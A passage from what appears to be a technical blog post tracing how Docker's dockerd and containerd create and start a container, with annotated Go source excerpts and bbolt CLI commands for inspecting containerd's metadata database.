<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">loadContainers</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">dir</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">ReadDir</span><span class="p">(</span><span class="n">daemon</span><span class="o">.</span><span class="n">repository</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">v</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">dir</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">id</span> <span class="o">:=</span> <span class="n">v</span><span class="o">.</span><span class="n">Name</span><span class="p">()</span>
        <span class="n">c</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">id</span><span class="p">)</span>
        <span class="n">containers</span><span class="p">[</span><span class="n">c</span><span class="o">.</span><span class="n">ID</span><span class="p">]</span> <span class="o">=</span> <span class="n">c</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="12-start">1.2. Start</h3>

<p>After the container is created, the container-starting request is sent to <code class="language-plaintext highlighter-rouge">dockerd</code> to run the container.</p>

<p>Inside <code class="language-plaintext highlighter-rouge">ContainerStart()</code>, the <code class="language-plaintext highlighter-rouge">daemonCfg</code> is created to hold the current daemon (<code class="language-plaintext highlighter-rouge">dockerd</code>) configuration [1]. <code class="language-plaintext highlighter-rouge">daemon.GetContainer()</code> is then called to retrieve the matching container object from the memory store [2]. Finally, <code class="language-plaintext highlighter-rouge">containerStart()</code> is called to start the container with these configurations [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerStart</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">vars</span><span class="p">[</span><span class="s">"name"</span><span class="p">],</span> <span class="n">r</span><span class="o">.</span><span class="n">Form</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"checkpoint"</span><span class="p">),</span> <span class="n">r</span><span class="o">.</span><span class="n">Form</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"checkpoint-dir"</span><span class="p">));</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/start.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">ContainerStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">name</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpoint</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpointDir</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">daemonCfg</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">config</span><span class="p">()</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">GetContainer</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerStart</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemonCfg</span><span class="p">,</span> <span class="n">ctr</span><span class="p">,</span> <span class="n">checkpoint</span><span class="p">,</span> <span class="n">checkpointDir</span><span class="p">,</span> <span class="no">true</span><span class="p">)</span> <span class="c">// [3]</span>
<span class="p">}</span>

<span class="c">// daemon/daemon.go</span>
<span class="k">type</span> <span class="n">configStore</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">config</span><span class="o">.</span><span class="n">Config</span>

    <span class="n">Runtimes</span> <span class="n">runtimes</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">containerStart()</code> does four things. First, it <strong>generates the container’s OCI spec</strong> [4], which determines the container’s runtime environment. Then it <strong>creates a container on the <code class="language-plaintext highlighter-rouge">containerd</code> side</strong> [5].</p>

<p>You may wonder why we still need to create another container even though we’ve already created it. Actually, these two creations are in different layers. The first is triggered by <code class="language-plaintext highlighter-rouge">docker create ...</code>, and it keeps metadata and config object in filesystem; it is <strong>for <code class="language-plaintext highlighter-rouge">dockerd</code></strong>.</p>

<p>This time, the creation is for <strong><code class="language-plaintext highlighter-rouge">containerd</code>-level</strong> container object. <code class="language-plaintext highlighter-rouge">containerd</code> inserts a record about the OCI spec and shim/runtime into the database.</p>

<p>After that, <code class="language-plaintext highlighter-rouge">dockerd</code> asks <code class="language-plaintext highlighter-rouge">containerd</code> to <strong>create a task</strong> [6]. A task is the <code class="language-plaintext highlighter-rouge">containerd</code>-level handle for the running container; creating it starts the shim daemon, which in turn creates the init process. At this point the task is created but stopped, waiting to be unblocked before it executes the entrypoint binary.</p>

<p>Later, it then calls <code class="language-plaintext highlighter-rouge">tsk.Start()</code> [7] to <strong>start the task</strong>, indirectly telling the shim daemon to unblock the init process, which finally executes the entrypoint binary and becomes the container.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/start.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">containerStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">daemonCfg</span> <span class="o">*</span><span class="n">configStore</span><span class="p">,</span> <span class="n">container</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">checkpoint</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpointDir</span> <span class="kt">string</span><span class="p">,</span> <span class="n">resetRestartManager</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// ... container setting</span>
    <span class="c">// 1. build OCI spec</span>
    <span class="n">spec</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">createSpec</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemonCfg</span><span class="p">,</span> <span class="n">container</span><span class="p">,</span> <span class="n">mnts</span><span class="p">)</span> <span class="c">// [4]</span>
    
    <span class="c">// [...]</span>
    <span class="c">// 2. create a container (containerd.services.containers.v1.Containers/Create)</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">libcontainerd</span><span class="o">.</span><span class="n">ReplaceContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerd</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="n">shim</span><span class="p">,</span> <span class="n">createOptions</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="o">*</span><span class="n">containerd</span><span class="o">.</span><span class="n">Client</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
        <span class="n">is</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">imageService</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">mobyc8dstore</span><span class="o">.</span><span class="n">ImageService</span><span class="p">)</span>
        <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">is</span><span class="o">.</span><span class="n">ResolveImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">Config</span><span class="o">.</span><span class="n">Image</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">c</span><span class="o">.</span><span class="n">Image</span> <span class="o">=</span> <span class="n">img</span><span class="o">.</span><span class="n">Name</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">})</span>

    <span class="c">// [...]</span>
    <span class="c">// 3. create a task (containerd.services.tasks.v1.Tasks/Create)</span>
    <span class="n">tsk</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ctr</span><span class="o">.</span><span class="n">NewTask</span><span class="p">(</span><span class="c">/* ... */</span><span class="p">)</span> <span class="c">// [6]</span>

    <span class="c">// [...]</span>
    <span class="c">// 4. start the task (containerd.services.tasks.v1.Tasks/Start)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">tsk</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">WithoutCancel</span><span class="p">(</span><span class="n">ctx</span><span class="p">));</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [7]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="121-create-the-oci-spec">1.2.1. Create the OCI spec</h4>

<p><code class="language-plaintext highlighter-rouge">createSpec()</code> generates the OCI spec. It first gets the default spec [1] and registers config-parsing callbacks [2]. Later, the callbacks are invoked to modify the OCI spec [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/oci_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">createSpec</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">daemonCfg</span> <span class="o">*</span><span class="n">configStore</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">container</span><span class="o">.</span><span class="n">Mount</span><span class="p">)</span> <span class="p">(</span><span class="n">retSpec</span> <span class="o">*</span><span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span> <span class="n">_</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">opts</span> <span class="p">[]</span><span class="n">coci</span><span class="o">.</span><span class="n">SpecOpts</span>
        <span class="n">s</span>    <span class="o">=</span> <span class="n">oci</span><span class="o">.</span><span class="n">DefaultSpec</span><span class="p">()</span> <span class="c">// [1]</span>
    <span class="p">)</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">opts</span><span class="p">,</span>
        <span class="n">withCommonOptions</span><span class="p">(</span><span class="n">daemon</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">daemonCfg</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
    <span class="p">)</span>
    <span class="c">// set options callback</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="n">coci</span><span class="o">.</span><span class="n">ApplyOpts</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerdClient</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="n">ID</span><span class="o">:</span>          <span class="n">c</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span>
        <span class="n">Snapshotter</span><span class="o">:</span> <span class="n">snapshotter</span><span class="p">,</span>
        <span class="n">SnapshotKey</span><span class="o">:</span> <span class="n">snapshotKey</span><span class="p">,</span>
    <span class="p">},</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">ApplyOpts</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="n">Client</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">s</span> <span class="o">*</span><span class="n">Spec</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">SpecOpts</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">o</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">opts</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">o</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">client</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Most fields described by the default spec [4] are the same as the finally generated JSON config if you don’t pass additional options.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/pkg/oci/defaults.go</span>
<span class="k">func</span> <span class="n">DefaultSpec</span><span class="p">()</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">DefaultLinuxSpec</span><span class="p">()</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">DefaultLinuxSpec</span><span class="p">()</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">{</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
        <span class="n">Process</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">specs</span><span class="o">.</span><span class="n">Process</span><span class="p">{</span>
            <span class="n">Capabilities</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">specs</span><span class="o">.</span><span class="n">LinuxCapabilities</span><span class="p">{</span>
                <span class="n">Bounding</span><span class="o">:</span>  <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
                <span class="n">Permitted</span><span class="o">:</span> <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
                <span class="n">Effective</span><span class="o">:</span> <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
            <span class="p">},</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="122-save-container-metadata-into-db">1.2.2. Save Container Metadata into DB</h4>

<p>The <code class="language-plaintext highlighter-rouge">.ReplaceContainer()</code> call is internally wrapped into a <code class="language-plaintext highlighter-rouge">"/containerd.services.containers.v1.Containers/Create"</code> request and sent to <code class="language-plaintext highlighter-rouge">containerd</code> [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/internal/libcontainerd/replace.go</span>
<span class="k">func</span> <span class="n">ReplaceContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="n">types</span><span class="o">.</span><span class="n">Client</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">,</span> <span class="n">spec</span> <span class="o">*</span><span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span> <span class="n">shim</span> <span class="kt">string</span><span class="p">,</span> <span class="n">runtimeOptions</span> <span class="n">any</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">containerd</span><span class="o">.</span><span class="n">NewContainerOpts</span><span class="p">)</span> <span class="p">(</span><span class="n">types</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">newContainer</span> <span class="o">:=</span> <span class="k">func</span><span class="p">()</span> <span class="p">(</span><span class="n">types</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">client</span><span class="o">.</span><span class="n">NewContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="n">shim</span><span class="p">,</span> <span class="n">runtimeOptions</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newContainer</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/containers/v1/containers_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containersClient</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">CreateContainerRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">CreateContainerResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">CreateContainerResponse</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.containers.v1.Containers/Create"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, <code class="language-plaintext highlighter-rouge">_Containers_Create_Handler()</code> is called to save the container object into the boltdb (<code class="language-plaintext highlighter-rouge">/var/lib/containerd/io.containerd.metadata.v1.bolt/meta.db</code>) [2].</p>

<p><a href="https://github.com/etcd-io/bbolt"><code class="language-plaintext highlighter-rouge">bbolt</code></a> is an embedded key/value database for Go, and here it is used as a metadata store by <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/containers/v1/containers_grpc.pb.go</span>
<span class="k">func</span> <span class="n">_Containers_Create_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">dec</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">,</span> <span class="n">interceptor</span> <span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInterceptor</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">info</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInfo</span><span class="p">{</span>
        <span class="n">Server</span><span class="o">:</span>     <span class="n">srv</span><span class="p">,</span>
        <span class="n">FullMethod</span><span class="o">:</span> <span class="s">"/containerd.services.containers.v1.Containers/Create"</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">handler</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="k">interface</span><span class="p">{})</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">ContainersServer</span><span class="p">)</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">CreateContainerRequest</span><span class="p">))</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/services/containers/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateContainerRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateContainerResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">withStoreUpdate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">container</span> <span class="o">:=</span> <span class="n">containerFromProto</span><span class="p">(</span><span class="n">req</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">created</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">Store</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="p">)</span>
        <span class="n">resp</span><span class="o">.</span><span class="n">Container</span> <span class="o">=</span> <span class="n">containerToProto</span><span class="p">(</span><span class="o">&amp;</span><span class="n">created</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The container object here is different from <code class="language-plaintext highlighter-rouge">dockerd</code>’s. <code class="language-plaintext highlighter-rouge">containerd</code>’s container object is a <strong>runtime metadata record</strong> (ID, Runtime, Snapshotter, Image, Spec, Labels, …). They are persisted independently in different stores.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/containers/containers.go</span>
<span class="k">type</span> <span class="n">Container</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">Spec</span> <span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If you are interested in how the DB entry looks, you can first install the <code class="language-plaintext highlighter-rouge">bbolt</code> CLI:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>go <span class="nb">install </span>go.etcd.io/bbolt/cmd/bbolt@latest
</code></pre></div></div>

<p>It allows you to view the entry content from <code class="language-plaintext highlighter-rouge">meta.db</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># [Check database file integrity]</span>
bbolt check meta.db
<span class="c">## Response: OK</span>

<span class="c"># [List the bucket]</span>
bbolt buckets meta.db
<span class="c">## Response: v1</span>

<span class="c"># [List and get keys]</span>
bbolt keys meta.db v1
<span class="c">## Response:</span>
<span class="c">##  moby</span>
<span class="c">##  moby_history</span>
<span class="c">##  version</span>
<span class="c">##</span>
<span class="c">## PS. moby and moby_history are sub-buckets</span>

bbolt keys meta.db v1 moby containers
<span class="c">## Response:</span>
<span class="c">##  db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11</span>

bbolt keys meta.db v1 moby containers db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11 spec
<span class="c">## Response:</span>
<span class="c">##  0a3674797065732e636f6e7461...(lots hex value)</span>
<span class="c">## decoded: .. "ociVersion":"1.3.0","process":{"terminal":true,"consoleSize":{"height":50,"width":212}, ...</span>
</code></pre></div></div>

<h4 id="123-create-bundle--spawn-shim-daemon">1.2.3. Create Bundle &amp; Spawn shim Daemon</h4>

<p><code class="language-plaintext highlighter-rouge">ctr.NewTask()</code> ends up as a <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Create"</code> request to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<p>The handler <code class="language-plaintext highlighter-rouge">Create()</code> first gets the container object from the boltdb <code class="language-plaintext highlighter-rouge">meta.db</code> [1] and sets up the create options [2]. Finally, <code class="language-plaintext highlighter-rouge">rtime.Create()</code> is called with these options [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateTaskRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateTaskResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">opts</span> <span class="o">:=</span> <span class="n">runtime</span><span class="o">.</span><span class="n">CreateOpts</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Spec</span><span class="o">:</span> <span class="n">container</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span>
        <span class="n">IO</span><span class="o">:</span> <span class="n">runtime</span><span class="o">.</span><span class="n">IO</span><span class="p">{</span>
            <span class="n">Stdin</span><span class="o">:</span>    <span class="n">r</span><span class="o">.</span><span class="n">Stdin</span><span class="p">,</span>
            <span class="n">Stdout</span><span class="o">:</span>   <span class="n">r</span><span class="o">.</span><span class="n">Stdout</span><span class="p">,</span>
            <span class="n">Stderr</span><span class="o">:</span>   <span class="n">r</span><span class="o">.</span><span class="n">Stderr</span><span class="p">,</span>
            <span class="n">Terminal</span><span class="o">:</span> <span class="n">r</span><span class="o">.</span><span class="n">Terminal</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
